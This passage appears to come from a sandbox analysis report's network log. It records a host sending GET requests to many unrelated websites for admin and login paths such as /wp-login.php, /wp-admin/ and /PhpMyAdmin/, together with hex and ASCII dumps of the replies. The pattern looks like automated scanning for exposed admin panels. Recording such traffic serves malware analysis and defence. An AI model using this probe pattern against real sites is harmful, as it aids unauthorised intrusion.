2023-12-22 20:14:59 UTC	1543	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.4	61897	13.248.169.48	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:58 UTC	337	OUT	GET /wp-admin/ HTTP/1.1 Host: customizedperformance.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:59 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:14:59 GMT Content-Type: text/html Content-Length: 12976 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-32b0" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_ZdFEKjMoFXz7B8q2HIa43lK53xwJWSSOxOxnR0RciOAnprDMLQeMr7oApCHsCuZOZEBzi52wcH6cfHoFmiXzjw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:14:59 UTC	12976	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.4	61918	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:59 UTC	328	OUT	GET /wp-login.php HTTP/1.1 Host: loghole.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:59 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:14:59 GMT Content-Type: text/html Content-Length: 1543 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-607" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_A+EDnTAnlrvOMxhYF7/2dHtDcRMHHoPfsSQbylf/BvhHbll+rervdAtSUaZ0mdVPNem6bhrh1qeLFFOK5HOL1A Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:14:59 UTC	1543	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.4	61877	20.197.30.48	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:59 UTC	177	OUT	GET //admin/ HTTP/1.1 Host: trivandrum.german.in Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:59 UTC	1105	IN	Data Raw: 48 54 54 50 2f 31 2e 30 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 32 20 44 65 63 20 32 30 32 33 20 32 30 3a 31 34 3a 35 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 58 53 52 46 2d 54 4f 4b 45 4e 3d 65 79 4a 70 64 69 49 36 49 6c 52 47 54 48 68 43 63 54 6c 4f 64 56 5a 4b 53 58 6b 76 52 47 39 69 4e 58 41 31 64 6b 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4d 46 6c 6d 5a 45 4a 68 64 6c 70 35 53 48 4a 6a 4e 48 42 79 65 46 4e 76 54 7a 6c 4a 56 47 5a 4f 4d 30 35 43 59 31 64 51 52 6b 4a 47 4f 58 42 6c 63 Data Ascii: HTTP/1.0 404 Not FoundDate: Fri, 22 Dec 2023 20:14:59 GMTServer: Apache/2.4.41 (Ubuntu)Cache-Control: no-cache, privateSet-Cookie: XSRF-TOKEN=eyJpdiI6IlRGTHhCcTlOdVZKSXkvRG9iNXA1dkE9PSIsInZhbHVlIjoiMFlmZEJhdlp5SHJjNHByeFNvTzlJVGZOM05CY1dQRkJGOXBlc
2023-12-22 20:14:59 UTC	1945	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 70 61 67 65 20 7c 20 57 65 6c 63 6f 6d 65 20 74 6f 20 4a 6f 73 68 20 46 72 6f 6e 74 65 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f Data Ascii: <!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>404 page \| Welcome to Josh Frontend</title> <meta content='width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.4	62110	141.193.213.10	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:59 UTC	335	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: jaydien.com Accept: / Accept-Encoding: deflate, gzip Cookie: __cf_bm=KH1uwYUkiaQkVP5cOY_ypjT3yakZKS8IRgK398GC6Ho-1703276097-1-ATsrDcy3gZfky6jboZViu9ii9axUoIM6cnwy7FZx3YJM/xekjJwq869G8AZ+hApp97jOweaC/AQIieRk4jdbekE= User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:59 UTC	1362	IN	HTTP/1.1 403 Forbidden Date: Fri, 22 Dec 2023 20:14:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Set-Cookie: apbct_timestamp=1703276099; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_site_landing_ts=1703276099; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_page_hits=1; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_cookies_test=%257B%2522cookies_names%2522%253A%255B%2522apbct_timestamp%2522%252C%2522apbct_site_landing_ts%2522%252C%2522apbct_page_hits%2522%255D%252C%2522check_value%2522%253A%2522136395426cb8366aa35bb4bbe9e86218%2522%257D; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_urls=%7B%22jaydien.com%2FPhpMyAdmin%2F%22%3A%5B1703276099%5D%7D; expires=Mon, 25 Dec 2023 20:14:59 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_site_referer=UNKNOWN; expires=Mon, 25 Dec 2023 20:14:59 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=Lax Expires: Fri, 01 Jan 71 00:00:00 +0000 Pragma: no-cache X-Powered-By: WP Engine X-Cacheable: NO:403 Cache-Control: max-age=0, must-revalidate, private X-Cache: MISS X-Cache-Group: normal CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 839b08c52aae6db0-MIA
2023-12-22 20:14:59 UTC	32	IN	Data Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: alt-svc: h3=":443"; ma=86400
2023-12-22 20:14:59 UTC	1369	IN	Data Raw: 31 66 39 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 27 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 70 72 69 76 61 74 65 22 3e Data Ascii: 1f98<!DOCTYPE html><html lang='en'><head><meta charset='utf-8' /><meta name='viewport' content='width=device-width, initial-scale=1' /><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="cache-control" content="private">
2023-12-22 20:14:59 UTC	1369	IN	Data Raw: 73 20 69 6e 66 69 6e 69 74 65 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 62 6f 74 68 3b 0a 09 09 09 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 6b 2d 62 6f 75 6e 63 65 64 65 6c 61 79 20 31 2e 34 73 20 69 6e 66 69 6e 69 74 65 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 62 6f 74 68 3b 0a 09 09 7d 0a 0a 09 09 2e 73 70 69 6e 6e 65 72 20 2e 62 6f 75 6e 63 65 31 20 7b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 33 32 73 3b 0a 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 33 32 73 3b 0a 09 09 7d 0a 0a 09 09 2e 73 70 69 6e 6e 65 72 20 2e 62 6f 75 6e 63 65 32 20 7b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 31 36 73 3b 0a 09 09 09 61 6e 69 6d 61 74 69 6f Data Ascii: s infinite ease-in-out both;animation: sk-bouncedelay 1.4s infinite ease-in-out both;}.spinner .bounce1 {-webkit-animation-delay: -0.32s;animation-delay: -0.32s;}.spinner .bounce2 {-webkit-animation-delay: -0.16s;animatio
2023-12-22 20:14:59 UTC	1369	IN	Data Raw: 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 30 37 33 61 61 3b 0a 09 09 7d 0a 09 09 61 3a 68 6f 76 65 72 2c 0a 09 09 61 3a 61 63 74 69 76 65 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 30 36 37 39 39 3b 0a 09 09 7d 0a 09 09 61 3a 66 6f 63 75 73 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 31 32 34 39 36 34 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 0a 09 09 09 09 09 30 20 30 20 30 20 31 70 78 20 23 35 62 39 64 64 39 2c 0a 09 09 09 09 09 30 20 30 20 32 70 78 20 31 70 78 20 72 67 62 61 28 33 30 2c 20 31 34 30 2c 20 31 39 30 2c 20 30 2e 38 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 0a 09 09 09 09 09 30 20 30 20 30 20 31 70 78 20 23 35 Data Ascii: ;font-size: 14px ;}a {color: #0073aa;}a:hover,a:active {color: #006799;}a:focus {color: #124964;-webkit-box-shadow:0 0 0 1px #5b9dd9,0 0 2px 1px rgba(30, 140, 190, 0.8);box-shadow:0 0 0 1px #5
2023-12-22 20:14:59 UTC	1369	IN	Data Raw: 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 73 63 72 69 70 74 3e 0a 09 09 76 61 72 20 63 74 50 75 62 6c 69 63 46 75 6e 63 74 69 6f 6e 73 20 3d 20 7b 22 5f 61 6a 61 78 5f 6e 6f 6e 63 65 22 3a 22 30 65 36 66 31 30 39 34 63 66 22 2c 22 5f 72 65 73 74 5f 6e 6f 6e 63 65 22 3a 22 34 39 66 38 64 38 64 62 32 31 22 2c 22 5f 61 6a 61 78 5f 75 72 6c 22 3a 22 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 2c 22 5f 72 65 73 74 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6a 61 79 64 69 65 6e 2e 63 6f 6d 5c 2f 77 70 2d 6a 73 6f 6e 5c 2f 22 2c 22 64 61 74 61 5f 5f 63 6f 6f 6b 69 65 73 5f 74 79 70 65 22 3a 22 6e 61 Data Ascii: .com/wp-includes/js/jquery/jquery.min.js'></script><script>var ctPublicFunctions = {"_ajax_nonce":"0e6f1094cf","_rest_nonce":"49f8d8db21","_ajax_url":"\/wp-admin\/admin-ajax.php","_rest_url":"https:\/\/jaydien.com\/wp-json\/","data__cookies_type":"na
2023-12-22 20:14:59 UTC	1369	IN	Data Raw: 72 65 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 65 6e 61 62 6c 65 64 20 4a 61 76 61 53 63 72 69 70 74 2e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 27 6a 73 5f 70 61 73 73 65 64 27 3e 0a 09 09 09 3c 68 33 3e 50 6c 65 61 73 65 20 63 6c 69 63 6b 20 74 68 65 20 6c 69 6e 6b 20 62 65 6c 6f 77 20 74 6f 20 70 61 73 73 20 74 68 65 20 70 72 6f 74 65 63 74 69 6f 6e 2c 3c 2f 68 33 3e 0a 09 09 09 3c 61 20 68 72 65 66 3d 27 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 27 3e 3c 73 63 72 69 70 74 3e 67 65 74 5f 63 75 72 72 65 6e 74 5f 75 72 6c 28 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 61 3e 0a 09 09 09 3c 62 72 20 2f 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 27 6a 73 5f 6e 6f 74 69 63 65 27 3e 4f 72 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 75 74 Data Ascii: re that you have enabled JavaScript.</div> <div id='js_passed'><h3>Please click the link below to pass the protection,</h3><a href='/PhpMyAdmin/'><script>get_current_url();</script></a><br /><p class='js_notice'>Or you will be aut
2023-12-22 20:14:59 UTC	1251	IN	Data Raw: 61 73 73 5f 6b 65 79 27 2c 20 65 73 63 61 70 65 28 27 61 62 36 33 34 33 39 62 33 32 62 30 61 31 65 38 34 34 65 35 61 62 36 64 36 66 34 65 32 35 35 39 30 27 29 2c 20 64 61 74 65 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 5d 2c 0a 09 09 09 09 5b 27 77 6f 72 64 70 72 65 73 73 5f 61 70 62 63 74 5f 61 6e 74 69 62 6f 74 27 2c 20 65 73 63 61 70 65 28 27 34 31 36 62 31 38 63 66 62 62 34 66 32 33 61 33 34 32 30 35 37 66 33 66 35 37 31 61 30 33 32 31 33 36 33 38 34 33 31 61 34 39 31 34 65 31 62 37 63 61 64 63 64 37 38 63 31 61 32 63 62 36 63 36 27 29 2c 20 64 61 74 65 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 5d 2c 0a 09 09 09 09 5b 27 63 74 5f 73 66 77 5f 70 61 73 73 65 64 27 2c 20 27 31 27 2c 20 64 61 74 65 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 5d 0a 09 09 09 Data Ascii: ass_key', escape('ab63439b32b0a1e844e5ab6d6f4e25590'), date.toUTCString()],['wordpress_apbct_antibot', escape('416b18cfbb4f23a342057f3f571a03213638431a4914e1b7cadcd78c1a2cb6c6'), date.toUTCString()],['ct_sfw_passed', '1', date.toUTCString()]
2023-12-22 20:14:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.4	62037	185.162.89.66	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:59 UTC	184	OUT	GET /wp-login.php HTTP/1.1 Host: oceanictrailers.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:59 UTC	508	IN	HTTP/1.1 200 OK Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure x-frame-options: SAMEORIGIN content-length: 5866 date: Fri, 22 Dec 2023 20:14:59 GMT alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-12-22 20:14:59 UTC	860	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 4f 63 65 61 6e 69 63 20 54 72 61 69 6c 65 72 73 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 72 63 68 69 76 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Oceanic Trailers — WordPress</title><meta name='robots' content='max-image-preview:large, noindex, noarchiv
2023-12-22 20:14:59 UTC	5006	IN	Data Raw: 2e 61 75 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 6f 67 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 65 66 65 72 72 65 72 27 20 63 6f 6e 74 65 6e 74 3d 27 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 27 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6f 63 65 61 6e 69 63 74 72 61 69 6c 65 72 73 2e 63 6f 6d 2e 61 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f Data Ascii: .au/wp-admin/css/login.min.css?ver=6.4.2' media='all' /><meta name='referrer' content='strict-origin-when-cross-origin' /><meta name="viewport" content="width=device-width" /><link rel="icon" href="https://oceanictrailers.com.au/wp-content/uploads/

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.4	61967	91.132.253.137	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:59 UTC	179	OUT	GET /index.php HTTP/1.1 Host: flandria-loisirs.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:59 UTC	533	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:14:59 GMT Server: Apache X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=300 Upgrade: h2,h2c Connection: Upgrade, close Location: https://www.flandria-loisirs.com/index.php/ Cache-Control: max-age=0 Expires: Fri, 22 Dec 2023 20:14:59 GMT X-XSS-Protection: 1; mode=block Content-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval'; img-src * data: blob: 'unsafe-inline'; Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:14:59 UTC	430	IN	Data Raw: 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6c 61 6e 64 72 69 61 2d 6c 6f 69 73 69 72 73 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6c 61 6e 64 72 69 61 2d 6c 6f 69 73 69 72 73 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 2f 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: 1a2<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://www.flandria-loisirs.com/index.php/'" /> <title>Redirecting to https://www.flandria-loisirs.com/index.php/</title>

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.4	62126	34.149.87.45	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:59 UTC	183	OUT	GET /admin.php HTTP/1.1 Host: www.valentinegrowers.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
